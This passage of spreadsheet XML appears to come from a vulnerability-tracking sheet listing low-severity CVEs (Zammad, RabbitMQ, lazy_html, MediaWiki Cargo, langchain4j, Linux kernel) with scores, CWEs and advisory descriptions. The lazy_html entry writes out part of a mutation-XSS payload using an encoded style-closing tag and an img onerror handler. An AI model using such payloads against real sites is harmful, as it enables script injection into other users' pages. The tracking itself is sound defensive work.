        <v>2.4</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <t>Smartphone application Tohoku Electric Power "Yorisou e Net" uses a hard-coded cryptographic key, which may allow an attacker to retrieve a hard-coded cryptographic key from the affected product.</t>
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75553</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63204</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, an authenticated user with agent permissions can supply an arbitrary AI analytics run identifier to the ticket summarize endpoint and receive the AI provider error message stored for that run, even if the run belongs to a ticket the agent is not authorized to access. The disclosure is limited to the provider error string; ticket content is not exposed. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63204</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65828</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, the legacy destroy_form action on AttachmentsController deletes UploadCache Store records based solely on a user-supplied form_id without verifying that the requesting user owns those records. An authenticated attacker who learns another user's pending-upload UUID can silently remove temporary file uploads before the victim submits their ticket or article. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65828</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67234</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, get_auth_mechanism/1 used term_to_binary/1 on the strict_auth_mechanism or preferred_auth_mechanism atom when clearing the corresponding cookie, producing a non-ASCII cookie name that violates RFC 6265 and can prevent the browser from deleting the preference. The issue is not directly exploitable for code execution or data exfiltration; its security relevance is limited to stale authentication-mechanism preferences persisting across logout and login cycles. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67234</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67420</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5, RabbitMQ OAuth credential refresh retains revoked runtime tags. when an existing AMQP connection refreshes from an OAuth token that grants the impersonator tag to a valid same-username token that no longer grants that tag, RabbitMQ updates the OAuth backend implementation (token/scopes/expiry) but leaves the connection's runtime #user.tags unchanged. rabbitaccesscontrol:checkuserid/2 then still honors the stale impersonator tag, so the connection (including newly opened channels) can continue publishing messages with a foreign AMQP userid after that privilege should have been revoked. A fresh connection using the downgraded token correctly refuses the same publish, proving the defect is stale session state rather than the token Limited to connections that once held impersonator and successfully refresh to a downgraded same-username rabbitauthbackendoauth2 (or an equivalent refresh-capable backend that returns tags) is enabled for This issue is fixed in versions 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67420</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92106</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dashbitco lazy_html allows mutation XSS via a parse and serialize round-trip of attacker-supplied HTML.
LazyHTML.to_html/2 and LazyHTML.Tree.to_html/2 decide whether to escape an element's text from its tag name alone. A style or script element inside SVG or MathML foreign content is parsed with character references decoded, but is serialized as an HTML raw-text element, so its text is emitted unescaped. Encoded markup such as &amp;lt;/style&amp;gt;&amp;lt;img src=x onerror=...&amp;gt; inside &lt;svg&gt;&lt;style&gt; therefore closes the element on re-parse and becomes live markup. Applications that parse untrusted HTML with lazy_html, filter the document or tree, and serialize it for display are affected, since the payload is a plain text node that no element or attribute filter sees.
This issue affects lazy_html: from 0.1.0 before 0.1.13.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92106</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96874</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S430" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in the Mediawiki - Cargo extension allows Stored XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96874</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56729</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-280, CWE-284</t>
        </is>
      </c>
      <c r="S431" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, when multiple KB categories have different editor roles assigned, a user with knowledge_base.editor in one category can see answer titles and updated_at timestamps from categories they do not have editor access to , via the global quick search. Category names are not leaked, and opening the answer returns "Page not found," but the title alone may disclose sensitive information. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56729</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56730</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="inlineStr"/>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, an authorization bypass vulnerability was found that allows an authenticated agent to read knowledge base answer content they should not be able to access. The vulnerable GraphQL mutation is meant to transform a knowledge base answer suggestion so it can be inserted into the ticket editor, but it only checks if the user has the ticket.agent permission. Checking the authorization to the knowledge base answer itself is missing. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56730</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66078</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6, protected tag bypass via bulk-delete. dELETE /api/users/:name refuses to delete users tagged protected (rabbitmgmtwmuser:deleteresource/2 checks isprotecteduser). POST /api/users/bulk-delete iterates the supplied username list and calls rabbitauthbackendinternal:deleteuser/2 directly , that function has no protected-tag check , so the guard is silently An administrator can delete protected-tagged service accounts via the bulk endpoint, bypassing a safeguard the test suite confirms is rabbitmqmanagement enabled Attacker has the administrator tag A protected-tagged user. This issue is fixed in versions 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6.</t>
        </is>
      </c>
      <c r="T433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66078</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97884</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S434" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file updatestudent.php of the component Student Update Functionality. The manipulation of the argument eno results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97884</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97868</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in sheshbabu zen up to 1.5.0. Affected by this issue is the function dangerouslySetInnerHTML of the file features/notes/NotesEditor.jsx of the component Note Editor. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97868</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97869</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in langchain4j up to 1.5.3-beta10/1.11.10-beta18/1.18.1-beta27. This vulnerability affects the function AgenticScopeSerializer.fromJson of the file AgenticScopeJsonSerializationIT.java of the component LangChain4j-agentic. This manipulation causes deserialization. Remote exploitation of the attack is possible. The attack's complexity is rated as high. It is stated that the exploitability is difficult. The exploit has been published and may be used. Upgrading to version 1.5.3-beta11, 1.11.10-beta19 and 1.18.1-beta28 is able to resolve this issue. Upgrading the affected component is advised. The project maintainer kindly explains: "The issue was reported to us privately on 23 July 2026 and fixed in releases published on 29 July 2026. It is tracked as GHSA-gmwr-7wmf-mrjm. Exploitation requires an application to have enabled AgenticScope persistence, which is opt-in, and an attacker who can already write to that store. All maintained release lines have been patched."</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97869</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100070</t>
        </is>
      </c>
      <c r="D437" s="5" t="inlineStr"/>
      <c r="E437" s="5" t="inlineStr"/>
      <c r="F437" s="5" t="inlineStr"/>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr"/>
      <c r="S437" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_nat_sip: rewind offset when NAT shrinks the packet
sashiko says:
 If map_addr() changes the packet length, such as when the public NAT IP
 string is shorter or longer than the internal IP, coff will still point to
 the offset relative to the pre-mangled packet.
 If the packet shrinks, coff could overshoot the correct position,
 potentially causing the next ct_sip_parse_header_uri() call to silently
 skip bytes and miss subsequent Contact headers. Could this lead to a
 failure to NAT those subsequent headers and leak internal network details?</t>
        </is>
      </c>
      <c r="T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100070</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100071</t>
        </is>
      </c>
      <c r="D438" s="5" t="inlineStr"/>
      <c r="E438" s="5" t="inlineStr"/>
      <c r="F438" s="5" t="inlineStr"/>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr"/>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: hsr: free learned nodes on device setup failure
hsr_dev_finalize() can fail after a lower-device RX handler has
already been registered (slave A is added before the failable slave B
and interlink adds). RX handlers run in softirq regardless of the
master's state, so frames received in that window can learn dynamic
nodes into node_db, and the error unwind never releases them.
